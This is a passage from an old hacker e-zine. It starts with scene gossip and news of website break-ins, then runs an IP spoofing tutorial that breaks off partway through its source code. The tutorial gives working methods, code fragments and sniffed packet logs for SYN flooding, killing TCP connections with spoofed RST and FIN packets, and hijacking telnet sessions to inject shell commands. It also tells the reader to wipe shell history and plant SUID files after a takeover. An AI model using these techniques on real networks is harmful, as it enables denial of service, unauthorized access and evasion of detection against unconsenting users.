Now, I don't get on well with Modify or The Messiah (who are in like, 3 other groups each) but Deprave is a good friend, Sludge and Acid I have never met and Bronc is cool. I don't know what's goin down wit that shit, but the last thing I need is some punk trying to say that I write shit about Technophoria, seeing I have never written a thing about them. But anyway, if you do visit the Technophoria WWW site, you will see that sIn and Technophoria are working on the same project with the same people, Utopia (mentioned in the last issue by *ODPHREAK*). I wonder who will take the credit and / or release the actual program, hmm.. I talked to The Messiah...

Utopia will be an encryption utility, released by SIN/Technophoria, written by The Messiah and Fucking Hostile. No release date is given.
encryption util? for what purposes?
Encrypting files, clipboard, and an editor, like Puffer.
thru windoze?
Yes.
ahh 16 bit.
With plans for a 32 bit version.
because doesn't pgp do that and a lot more?
No, it doesn't.
what kind of encryption are we talking about?
PGP only uses ONE algorithm, IDEA. About 16 different algorithms.
and yours will use?
RC4, RC5, IDEA, Blowfish, DES, SuperIDEA... I'm still looking into that...
isn't that just ripping other people's shit? blatantly
No. If so then PGP is ripping. Puffer is ripping. The source for almost all algorithms is released. So ppl can evaluate it..
what about RC5 source then?
Have it.
okay... so you have all your algorithms
RSA condones non-commercial use of RC4 and RC5. Pretty much.
but how will the program work then?
Right now I'm wondering which algorithms to put into it.
will it have secret keys and public keys like pgp ?
You select an algorithm, files, and hit encrypt... No, symmetric key encryption. One password...
isn't that a bit insecure?
I'm making a public key encryption program later on... No, it isn't.
seeing then the password will have to be given to the other user over a medium such as IRC
You can't transmit keys, true...
which can be logged
But this isn't for communication as much as file storage... People can use PGP to transmit keys...
so what will the program include?
Hmmm... what won't it? I'm hoping to include some steganography in it... It'll be something like Puffer, only WAY better...
okay 1st release will be 16-bit right?
Yes...
will it have any problems running thru 95 / NT ?
Nope. I'm using Win95...
will users need .dll files to run it?
One. But that'll come included... No VB bullshit... It's made in Delphi, so the runtime library is in the EXE...
delphi, i code borland c++
Get C++ Builder then...
i plan on doing so
Like Delphi, but uses C++...
okie, l8r
cya

3. Global kOS News And Questions / Answers : Spidey

There have been several rumors circulating about what happened to us since globalkos.org went down. They range from us being busted by feds to stories about purple shrouds and phenobarbital. There have also been rumors about dissension among our ranks and group infighting.

Q: What happened to globalkos.org? Did the feds shut it down? Did their ISP shut it down? Did they move their site to keep it hidden?
A: Half of us didn't feel like paying for it. We weren't shut down, nor is the site hidden out there somewhere. We're looking into alternatives.

Q: Did Acid Angel leave GkOS for Technophoria?
A: No. He is working with the guys at Technophoria, but he is still a part of Global kOS.

Q: Did Silicon Toad leave the group altogether?
A: Somebody came up with this one on the basis of a broken link at globalkos.org. ST moved his site, and no one bothered to update the link. Through some stretch of logic this guy decided it meant ST split.

Q: What about Up Yours 4?
A: It's slated for release on March 30th.

Q: Did GkOS get busted?
A: No.
Q: I thought Cobra (Vortex, Morbid Disorder, Kludge, or Ryan) was a member of GkOS. A: I've never even heard of these people. They are not present, nor former members. Our members are: Acid Angel Glitch Materva Raven Shadow Hunter Silicon Toad Spidey That Guy Zaven Q: I heard there was a major disagreement within the group, and there's a civil war going on between them. Is it true? A: No. This is completely unfounded. Whoever started this one pulled it straight out of his ass. 4. www.ncaa.com Hack Makes News : so1o Conflict member TiK hacked www.ncaa.com, he made TV news, papers, and big internet news, statements from the NCAA and other organisations can be found on www.infowar.com, so1o never believed TiK would or could hack such a site due to the high security levels, but good 'ole TiK proved us all wrong, expect the index.html s00n! 5. CodeZero To Release sunOS 5.x RootKit : so1o Yeah, werkin' on it, lewkout!! 6. Too Many nethosting.com Break-Ins : so1o www.hawkee.com and many other "vservers" at nethosting.com have been hacked or attacked, like sinnerz.com (although no damage was done to the site) and so the admin at nethosting can't be very happy with their security, I was talking to hawkee about the hacks into his system by two members of the CodeZero (thats what the numbers stood for - minus 2 from each, turn the 0 into a 26, then 1 = A, 2 = B, 3 = C etc. = CODEZERO) and he was saying that newhosting had really boosted their secruity, this was also the case when access to cough-syrup.nethosting.com was gained by one single hacker, as after the attack, the sendmail version was pumped from 8.8.4 to 8.8.5, nethosting are also considering taking action to prevent certain hosts from having access to the system. 7. 
sulfur of #hack to print a bi-monthly magazine : so1o

Access Denied will be printed by sulfur (Edward Givings) of #hack. Free copies will be distributed at Beyond Hope. It will be bi-monthly, so you get 6 issues a year, as opposed to 4 of 2600. Look out for it...

8. 2600 printers go bust and take $9000 : so1o

The latest news is that the 2600 printers have gone bust, and taken $9000 of the 2600's money with them; the Winter edition of 2600 might not come out. emmilio can't be very happy, can he?

===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================

.:. The CodeZero In Association With Dr_Sp00f Presents .:.
.:. A Confidence Remains High Production .:.

-=[ A short (yea right - T_K) overview of IP spoofing: PART I ]=-
-=[ Part of Dr_sp00f's Packet Project ]=-
(Includes Source for Linux 1.3.X and later kernels)

All text and Source code written by Dr_Sp00f himself (Copyright 1997)
All source tested on Linux kernel 2.0.X
All packet data captured with Sniffit 0.3.2 (a pre-release at that time)

PART I: Simple spoofing (Non blind)
-----------------------------------

0. Introduction
   0.1 What
   0.2 For whom
   0.3 Disclaimer
   0.4 Licence
1. Short explanation of some words
2. Description of sourcecode
   2.1 Source included
   2.2 Programmer notes
3. TCP/IP (UDP) in a hazelnutshell
4. Non-blind spoofing
   4.1 Know what you are doing
   4.2 SYN flooding
   4.3 Connection Killing
       4.3.1 Using reset (RST)
       4.3.2 Closing a connection (FIN)
       4.3.3 Improving
   4.4 Connection Hijacking
   4.5 Other
5. The source code

PART I: Simple spoofing (Non blind)

0. Introduction
---------------

0.1 What
--------

This document describes some IP spoofing attacks and gives you example source code of the programs used for these attacks (and packet sniffer logs, so you see exactly what happens).
It also provides you with an easy to use include file for experimenting a little yourself. Oh, if you make something nice with the "spoofit.h" file, please mail it to me (or a reference where it is available) with a little explanation of what it is (a few lines are enough)...

If you have interesting remarks, comments, ideas, ... please contact me: Dr_spoof@geocities.com

If YOU think of yourself, you are "3>/dev/null or >/dev/echo depends on how smart you are.

It is not wise to use what you don't know/understand, so read this before trying anything... it will only take a few minutes, and probably save you some hours of failure...

This code is not crippled in the usual way (removing some vital parts); its power is limited by its brevity, because I wanted to keep everything simple and illustrative (but working). It's a simple job to improve it, and that is the goal of this doc: that you improve it yourself.

Special thx to |ExcEEd| and theJUdgE, also to all those ppl who deserve it.

0.2 For whom
------------

For people with an elementary knowledge of TCP/IP, some knowledge of C (only the basic setup) and some general UNIX knowledge. It's no use reading this document if you are completely unaware of these things, but mind you, only a little knowledge is enough.

0.3 Disclaimer
--------------

I am in no way responsible for the use of this code. By using this software and reading this document you accept the fact that any damage (emotional, physical, data loss and the end of the world as we know it...) caused by the use or storage of these programs/documents is not MY responsibility.

I state that during the writing and testing of this document/source, I never violated any law. All spoofing was done between machines where I had legit root access, or where I had the permission of the legit root.

This code can be written by any competent programmer, so this source is not as harmful as some will say (cauz' I'm sure some people won't like this degree of disclosure).
0.4 Licence
-----------

All source code and text is freely available. You can spread it, as long as you don't charge for it (exceptions are a small reproduction fee, if it isn't spread together with commercial software or texts). You may not spread parts of the document; it should be spread as one package. You may not modify the text and/or source code. You can use spoofit.h or derived code in your own programs as long as they are not commercial (i.e. FREE), and you give me the credits for it.

1. Short explanation of some words
----------------------------------

This is a short explanation of some words you might see in the text/source. You probably know all this, but I put it in here anyway.

Sniffit
    My favourite packet sniffer; all sniffed sequences in this document come from it (at time of writing a pre-release, 0.3.2).

IP-spoofing (further referenced to as spoofing)
    The forging of IP packets.
    NOTE that not only IP based protocols are spoofed.
    NOTE that spoofing is also used on a constructive base (LAN spoofing, not discussed here).
    NOTE that I don't use it on a constructive base ;)

Non-blind spoofing
    Using spoofing to interfere with a connection that sends packets along your subnet (so generally one of the 2 hosts involved is located on your subnet, or all data traffic has to be passing your network device... you might consider taking a job at some transatlantic route provider).

Blind spoofing
    Using spoofing to interfere with a connection (or creating one) that does not send packets along your cable.

2. Description of sourcecode
----------------------------

2.1 Source included
-------------------

spoofit.h
    The include file that provides some easy to use spoofing functions. To understand the include file and its functions, read the header of that file for use of the C functions.

*.c
    Example programs (on the use of spoofit.h) that are discussed in this document. Details on these programs are included in the appropriate sections.

sniper-rst.c
    Basic TCP connection killer.
    (denial-of-service)

sniper-fin.c
    Basic TCP connection killer. (denial-of-service)

hijack.c
    Simple automated telnet connection hijacker.

2.2 Programmer notes
--------------------

These programs are just examples. That means they could be improved a lot. Because I wanted to keep them short and leave some stuff to your imagination, they are very simple. However they all work and are a good starting point.

3. TCP/IP (UDP) in a hazelnutshell
----------------------------------

Because it has been explained enough in 'Phrack Volume Seven, Issue Forty-Eight, File 14 of 18' by daemon9/route/infinity, and there is a lot of documentation available on the subject, I will only repeat some things very briefly. (Please read the Phrack #48 file or any other document on the subject before reading this.)

A connection is fully defined by 4 parameters: a source host and port, and a destination host and port. When you make a connection, data is sent in packets. Packets take care of low level traffic, and make sure the data arrives (sometimes with special error handling).

The spine of most networks is the IP protocol version 4. It is totally independent of all hardware protocols. TCP and UDP are higher level protocols wrapped up in IP packets. All those packets consist of a header and data.

IP header contains (amongst other things):
    IP of source and destination hosts for that packet, and the protocol type of the packet wrapped up in it (TCP=6, UDP=17, etc.).

UDP packets contain (amongst other things):
    port number of source and destination host. UDP has no such thing as SEQ/ACK; it is a very weak protocol.

TCP packets contain (amongst other things):
    port number of source and destination host, sequence and acknowledge numbers (further referred to as SEQ/ACK), and a bunch of flags.

    SEQ number: is counted byte per byte, and gives you the number of the NEXT byte to be sent, or that is sent in this packet.
    ACK number: is the SEQ number that is expected from the other host.
SEQ numbers are chosen at connection initiation.

I said it was going to be short... If you didn't understand the above text, read up on it first, because you won't understand sh!t of the rest.

4. Non-blind spoofing
---------------------

4.1 Know what you are doing
---------------------------

The concept of non-blind spoofing (NBS further in this doc) is pretty simple. Because packets travel within your reach, you can get the current sequence and acknowledge (SEQ/ACK further in this doc) numbers on the connection. NBS is thus a very easy and accurate method of attack, but limited to connections going over your subnet.

In spoofing documentation these attacks are sometimes omitted, because they are mostly 'denial-of-service' attacks, or because people don't realise the advantage a spoof (in particular a hijack) can have over simple password sniffing.

Spoofing in general is referred to as a very high level of attack. This refers to blind spoofing (BlS further in this doc), because NBS is kidstuff for a competent coder.

4.2 SYN flooding
----------------

Thoroughly discussed in 'Phrack Volume Seven, Issue Forty-Eight, File 13 of 18'. I won't waste much time on it.

Setup:
         host A <-----][----------X--------------->host B
                                  |
         host S <-----------------/

Concept:
Host S impersonates a SYN (connection init) coming from host A, to host B. Host A should be unreachable (e.g. turned off, non existent, ...). B sends out the second packet of the 3 way TCP handshake. Host B will now wait for a response from host A.

If host A is reachable it will tell host B (with a reset: RST) that it DID NOT initiate a connection, and thus host B received a bogus packet. (In that case host B will ignore the SYN, and *normally* nothing will happen.)

So if A is unreachable, B will wait for a response for some time. When doing multiple attacks, the backlog of host B is going to be exceeded and host B will not accept new connections (read up on TCP bugs for additional features ;) for some time.
4.3 Connection Killing
----------------------

Setup:
         host A <------X------------------------->host B     A,B have a TCP connection running
                       |
         host S <------/                                     A,S on same subnet

(setup is the same in both cases)

Use: Clearing mudders off your net, annoying that dude typing an important paper, etc... plain fun.

4.3.1 Using reset (RST)
-----------------------

Concept:
TCP packets have flags which indicate the status of the packet, like RST. That is a flag used to reset a connection. To be accepted, only the sequence number has to be correct (there is no ACK in a RST packet). So we are going to wait for packets in a connection between A and B. Assume we wait for packets to A. We will calculate (from B's packets) the sequence number for A's packets (from B's ACKs), and fire a bogus RST packet from S (faking to be A) to B.

An actual attack:
(These are real sniffed packets, although IP numbers of hosts were changed)

host A : 166.66.66.1
host B : 111.11.11.11   (S on same subnet as A)

(This is a good example of how things do not always go as you want; see below for a solution)

1) connection running... we wait for a packet to get the current SEQ/ACK
(A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
  SEQ (hex): 57E1F2A6   ACK (hex): B8BD7679   FLAGS: -AP---   Window: 3400
  (data removed because irrelevant, 2 bytes data)

2) This is the ACK of it + included data (which causes the SEQ number to change, and thus messes up our scheme, because this came very fast.)
(B->A)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
  SEQ (hex): B8BD7679   ACK (hex): 57E1F2A8   FLAGS: -AP---   Window: 2238
  (data removed because irrelevant, 2 bytes data)

3) ACK of it.
(A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
  SEQ (hex): 57E1F2A8   ACK (hex): B8BD767B   FLAGS: -A----   Window: 3400
  (data removed because irrelevant)

4) further data
(B->A)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
  SEQ (hex): B8BD767B   ACK (hex): 57E1F2A8   FLAGS: -AP---   Window: 2238
  (data removed because irrelevant)

5) ACK of it
(A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
  SEQ (hex): 57E1F2A8   ACK (hex): B8BD7691   FLAGS: -A----   Window: 3400

6) Now we get 2 RST packets. How do you explain that? Well, the first reset packet has been buffered somewhere on our system, because the ethernet segment was busy when we wanted to send it. This is the 'unexpected thing' I discussed above; here we are lucky, the data stream cooled down so fast. When it doesn't cool down so fast, we could miss our RST (or the connection will be killed a little later than we wanted); you'll see some ideas on how to fix that problem.

TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
  SEQ (hex): B8BD7679   FLAGS: ---R--

TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
  SEQ (hex): B8BD7691   FLAGS: ---R--
  (This was the packet that killed the connection)

Discussion of the program:
The discussion here is a bit weird; that is because 'sniper-rst.c' is not designed to be an optimal killer, merely to be an example. We have the problem of speed here. We miss some packets, which causes those resends. So we would design a better 'sniper' if we do the following:

- use blocking IO (not necessarily, because the RST killer would lose some of its beauty (looping); this is dealt with in the FIN killer example. Blocking is a little faster when a lot of packets come after each other.)
- multi-packet firing... fire more packets with incremented SEQ.
  (this is commented in the source)
- waiting for a pure ACK packet (no data), because otherwise you risk too much getting mid-transmission and not being fast enough. (disadvantage is the 'waiting period' before the connection is killed)

NOTE these examples were done on non-loaded networks, with non-loaded servers, which makes it a worst case scenario for speed problems.

4.3.2 Closing a connection (FIN)
--------------------------------

Concept:
Another flag is FIN and says: "no more data from sender". This flag is used when closing a connection down the normal legit way. So if there was a way to make a packet that is accepted by one of the two hosts, this host would believe the 'sender' didn't have any data left. Following (real) packets would be ignored as they are considered bogus. That's it: because we can sniff the current SEQ/ACK of the connection we can pretend to be either host A or B, and provide the other host with CORRECT packet information, and an evil FIN flag.

The beauty of it all is that after a FIN is sent, the other host always replies with one if it is accepted, so we have a way to verify our killing, and can be 100% sure of success (if for some reason we missed a SEQ or ACK, we can just resend). RST killing is more popular and is preferred, but I've put this in as an example, and I like it myself.

An actual attack:
(These are real sniffed packets, although IP numbers of hosts were changed)

host A : 166.66.66.1
host B : 111.11.11.11   (S on same subnet as A)

1) connection is running.... sniper is started on host S as
   'sniper-fin 166.66.66.1 23 111.11.11.11 1072'
   and waits for a packet to take action (we need to get SEQ/ACK)
   (mind you, switching host A and B would be the same, only S would be impersonating A instead of B)
   suddenly a packet arrives...
(A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  SEQ (hex): 19C6B98B   ACK (hex): 69C5473E   FLAGS: -AP---   Window: 3400
Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  45 E 00 . 00 . 2A * 30 0 5E ^ 40 @ 00 . 40 @ 06 . 5E ^ AD . 9D . C1 . 45 E 33 3
  9D . C1 . 2B + 0D . 00 . 17 . 04 . 30 0 19 . C6 . B9 . 8B . 69 i C5 . 47 G 3E >
  50 P 18 . 34 4 00 . 3A : 61 a 00 . 00 . 0D . 0A .
                                          ~~~~~~~~~ > 2 data bytes

2) sniper detected it, and sends a bogus packet.
(S as B -> A)
   We calculate our SEQ as: ACK of (A->B) packet
   We calculate our ACK as: SEQ of (A->B) packet + datalength of that packet (19C6B98B + 2 = 19C6B98D)
   (so we tell A we received the last packet, and will not transmit further data)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23
  SEQ (hex): 69C5473E   ACK (hex): 19C6B98D   FLAGS: -A---F   Window: 7C00
  (data removed because irrelevant)

3) host A now says: 'okay, you end the session, so here is my last data'
(A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  SEQ (hex): 19C6B98D   ACK (hex): 69C5473E   FLAGS: -AP---   Window: 3400
  (data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  SEQ (hex): 19C6B998   ACK (hex): 69C5473F   FLAGS: -A----   Window: 3400
  (data removed because irrelevant)

4) host A has now flushed its buffer and in its turn FINs the connection.
(A->B)
   sniper intercepts this packet and now knows the host fell for the spoof and the killing was a success! (host A will no longer accept any data)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  SEQ (hex): 19C6B998   ACK (hex): 69C5473F   FLAGS: -A---F   Window: 3400
  (data removed because irrelevant)

5) We impersonated B, making A believe we had no further data. But B doesn't know that and continues to send packets.
(B->A)
   host A has that connection closed, and thus thinks the real packets of B are spoofed (or at least bogus)!
   So host A sends some reset packets (RST).
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23
  SEQ (hex): 69C5473E   ACK (hex): 19C6B98D   FLAGS: -A----   Window: 3750
  (data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  SEQ (hex): 19C6B98D   FLAGS: ---R--
  (data removed because irrelevant)

6) This goes on for a couple of packets.

Discussion of the program (numbers correspond with those of 'An Actual Attack'):

1) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10);
   if(stat==-1)
     {printf("Connection 10 secs idle... timeout.\n");exit(1);}

   We use wait_packet on a non blocking socket. This way we can enable a 10 seconds timeout. This function returns when the correct packet has been delivered (or timeout).

2) sp_seq=pinfo.ack;
   sp_ack=pinfo.seq+pinfo.datalen;
   transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,
                 sp_seq,sp_ack,ACK|FIN);

   We calculate a spoofed SEQ/ACK, and fire off a fake FIN packet. As we don't send any data with it, our buffer is set to NULL and datalength to 0.
   NOTE together with FIN, you need to enable ACK.

3) N/A

4) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5);
   if(stat>=0)
     {printf("Killed the connection...\n"); exit(0);}

   We wait for a FIN packet (note the FIN in wait_packet). We use a 5 sec. timeout; if the function returns and stat>=0 (-1 on timeout), we know our attempt was successful.

5) N/A

6) N/A

NOTE We can have the same problem here as with the RST killer. But we didn't have it here, because the packet we responded upon was the end of a data stream (in fact it was an echo from a shell command).

4.3.3 Improving
---------------

Apart from multipacket firing, it is advised to launch 2 attacks (one in each direction). This allows one-way connections to be handled optimally.
I think of things like downloading data, which is a one way data-flow; it is much easier sending a RST from the (spoofed) receiver to the sender than the other way around. Those 2 attacks could both impersonate host A and B, thus giving us 4 times more chance of a successful kill. I'll leave further experimenting up to you (use your imagination to handle different situations).

4.4 Connection Hijacking
------------------------

Setup:
         host A <------X------------------------->host B     A,B have a TCP connection running (TELNET)
                       |
         host S <------/                                     A,S on same subnet

Concept:
(suppose a TELNET from A (client) to B (server))
TCP separates good and bogus packets by their SEQ/ACK numbers, i.e. B trusts the packets from A because of their correct SEQ/ACK numbers. So if there was a way to mess up A's SEQ/ACK, B would stop believing A's real packets. We could then impersonate A, but using correct SEQ/ACK numbers (that is, numbers correct for B). We would now have taken over the connection (host A is confused, B thinks nothing's wrong (almost correct, see 'actual attack'), and S sends 'correct' data to B). This is called 'Hijacking' a connection. (generally hijacking a TELNET session, but the same could be done with FTP, RLOGIN, etc...)

How could we mess up A's SEQ/ACK numbers? Well, by simply inserting a data packet into the stream at the right time (S as A->B), the server B would accept this data and update ACK numbers; A would continue to send its old SEQ numbers, as it's unaware of our spoofed data.

Use:
I already hear you wiseguys yelling: "Hey dude, why hijack a connection if you can sniff those packets anyway??" Well, anybody heard of One Time Passwords, Secure Key?? Case closed....
(S/Key: server challenges client, client and server calculate a code from the challenge and password, and compare that code. The password itself is never sent on the cable, so you can't sniff sh!t.)
(OTP: server has a list of passwords; once one is used, it is destroyed, so sniffing gets you a password that has 'just' expired ;)
(ALL types of identification that happen at connection (encrypted or not, trusted or not), and don't use encrypted data transfer, are vulnerable to 'hijacking'.)

An actual attack:
(These are real sniffed packets, although IP numbers of hosts were changed)
(suppose a TELNET from A (client) to B (server))

host A : 166.66.66.1
host B : 111.11.11.11   (S on same subnet as A)

1) connection running... we look with sniffit, and see he's busy in a shell. We start 'hijack' on host S as
   'hijack 166.66.66.1 2035 111.11.11.11'
   a packet containing data from (A->B) is detected... hijack takes action...
(A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  SEQ (hex): 5C8223EA   ACK (hex): C34A67F6   FLAGS: -AP---   Window: 7C00
Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  45 E 00 . 00 . 29 ) CA . F3 . 40 @ 00 . 40 @ 06 . C5 . 0E . 9D . C1 . 45 E 3F ?
  9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EA . C3 . 4A J 67 g F6 .
  50 P 18 . 7C | 00 . 6D m 29 ) 00 . 00 . 6C l
                                         ~~~~

2) host B (server) echoes that data byte (typing 'l' in a bash shell!!!) (you gotta know what you are doing)
(B->A)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  SEQ (hex): C34A67F6   ACK (hex): 5C8223EB   FLAGS: -AP---   Window: 2238
Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  45 E 00 . 00 . 29 ) B5 . BD . 40 @ 00 . FC . 06 . 1E . 44 D 9D . C1 . 2A * 0B .
  9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F6 . 5C \ 82 . 23 # EB .
  50 P 18 . 22 " 38 8 C6 . F0 . 00 . 00 . 6C l
                                         ~~~~

3) A simple ACK from host A to B responding to that echo. Because we know this can come, and we know a simple ACK doesn't contain data, we don't need this for SEQ/ACK calculation.
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  SEQ (hex): 5C8223EB   ACK (hex): C34A67F7   FLAGS: -A----   Window: 7C00
  (data removed because irrelevant)

4) Now we impersonate further data (following packet 1).
(S as A -> B)
   We calculate SEQ/ACK out of packet 1, NOT out of the 'echo' from B, because we have to be as fast as possible, and packet 2 could be slow. We send some backspaces and some enters, to clean up the command line. We will probably still get some error message back from the shell. But we handle that too! (see sourcecode)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  SEQ (hex): 5C8223EB   ACK (hex): C34A67F6   FLAGS: -AP---   Window: 7C00
Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  45 E 00 . 00 . 32 2 31 1 01 . 00 . 00 . 45 E 06 . 99 . F8 . 9D . C1 . 45 E 3F ?
  9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EB . C3 . 4A J 67 g F6 .
  50 P 18 . 7C | 00 . AE . F5 . 00 . 00 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 08 .
  0A . 0A .

5) This is the echo of our spoofed data. Look at the ACK.
(B->A)
   5C8223F5 = 5C8223EB + 0A (this is how we detect that the spoof was a success)
   NOTE that at this point the connection is ours, and A's SEQ/ACK numbers are completely f#cked up according to B.
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  SEQ (hex): C34A67F7   ACK (hex): 5C8223F5   FLAGS: -AP---   Window: 2238
Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  45 E 00 . 00 . 3C < B5 . BE . 40 @ 00 . FC . 06 . 1E . 30 0 9D . C1 . 2A * 0B .
  9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F7 . 5C \ 82 . 23 # F5 .
  50 P 18 . 22 " 38 8 26 & 7C | 00 . 00 . 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H
  5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 0D . 0A . 0D . 0A .

6) Hijack will now try to get on track of SEQ/ACK numbers again, to send the data we want to be executed.
   NOTE each time a packet 'out of numbering' arrives, the host should answer with the correct SEQ/ACK. This provides us with the certainty that a lot of packets are going to be sent with correct (and not changing) SEQ/ACK nrs. (this is what the mechanism of getting our numbers back straight is based upon)
   NOTE it's at this point the real TELNET client's session hangs. Most people ignore this and re-login after a few secs, accepting the accident as Murphy's law. (Well, it *can* happen without any spoofing involved.)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  SEQ (hex): 5C8223EB   ACK (hex): C34A67F7   FLAGS: -AP---   Window: 7C00
  (data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  SEQ (hex): C34A680B   ACK (hex): 5C8223F5   FLAGS: -A----   Window: 2238
  (data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-157.193.42.11.23
  SEQ (hex): 5C8223EB   ACK (hex): C34A67F7   FLAGS: -AP---   Window: 7C00
  (data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  SEQ (hex): C34A680B   ACK (hex): 5C8223F5   FLAGS: -A----   Window: 2238
  (data removed because irrelevant)

7) We are back on track (or at least hijack is, because this is going very fast). And we fire off our faked bash command.
   echo "echo HACKED" >> $HOME/.profile
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  SEQ (hex): 5C8223F5   ACK (hex): C34A680B   FLAGS: -AP---   Window: 7C00
Packet ID (from_IP.port-to_IP.port): 166.66.66.1-111.11.11.11.23
  45 E 00 . 00 . 4D M 31 1 01 . 00 . 00 . 45 E 06 . 99 . DD . 9D . C1 . 45 E 3F ?
  9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # F5 . C3 . 4A J 68 h 0B .
  50 P 18 . 7C | 00 . 5A Z B6 . 00 . 00 . 65 e 63 c 68 h 6F o 20   22 " 65 e 63 c
  68 h 6F o 20   48 H 41 A 43 C 4B K 45 E 44 D 22 " 20   3E > 3E > 24 $ 48 H 4F O
  4D M 45 E 2F / 2E . 70 p 72 r 6F o 66 f 69 i 6C l 65 e 0A . 00 .
8) now we wait for this data to be confirmed. ACK = 5C8223F5 + 025 (=37 bytes)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  SEQ (hex): C34A680B   ACK (hex): 5C82241A   FLAGS: -AP---   Window: 2238
Packet ID (from_IP.port-to_IP.port): 157.193.42.11.23-157.193.69.63.1040
  (data removed because irrelevant)

9) The connection runs on. Now you can execute more commands (just stay on track of SEQ/ACK), and even finish the connection (with the same mechanism as sniper, or with sniper itself... here FIN is recommended).

NOTE: here it is important to be in a shell. But if you have been watching someone, and you notice he's always going directly to 'pine' and you can't get in between in time: NO PROBS.... just make a cleanup string that cleans up 'pine' and puts you back in the shell. (some control chars, hotkeys, whatever....)
NOTE: if you clean up the .sh_history or .bash_history (whatever) this attack is one of the nicest there is. Another advantage over sniffing.
NOTE: No one says you have to make a .rhosts file (rlogin and family might be disabled); you can change permissions, put stuff SUID, put it public, install stuff, mail, etc..

Discussion of the program (numbers correspond with those of 'An Actual Attack'):

1) wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0);

   Waiting for actual data (PSH is always used for packets containing data in interactive services like TELNET)

2) N/A

3) N/A

4) sp_seq=attack_info.seq+attack_info.datalen;
   sp_ack=attack_info.ack;
   transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER, 23,sp_seq,sp_ack,ACK|PSH);

   We recalculate the sequence number (using SEQ and datalength of packet 1) and we send a spoofed packet with ACK and PSH flag, containing the cleanup data in to_data.
5) while(count<5)
     {
     wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
     if(attack_info.ack==sp_seq+sizeof(to_data))
       count=PERSONAL_TOUCH;
     else count++;
     };

   We wait for a confirmation that our spoofed sequence is accepted. We expect a packet with an ACK set (PSH or not). It should come within 5 packets; we use this limit because we should be able to handle some previous ACK packets!
   NOTE we don't check SEQ nrs, because we have no clue what they are going to be (data might have been sent our way, or not).

6) while(count<10)
     {
     old_seq=serv_seq;
     old_ack=serv_ack;
     wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0);
     if(attack_info.datalen==0)
       {
       serv_seq=attack_info.seq+attack_info.datalen;
       serv_ack=attack_info.ack;
       if( (old_seq==serv_seq)&&(serv_ack==old_ack) )
         count=PERSONAL_TOUCH;
       else count++;
       }
     };

   To get back on track, we try to receive 2 ACK packets without data with the same SEQ/ACK. We know enough packets will be sent as a response to incorrect packets from the confused host A. This is how we get back on track.
   NOTE In a case where A completely gave up, simply spoof a packet with incorrect SEQ/ACK to get the correct numbers back.

7) transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P,
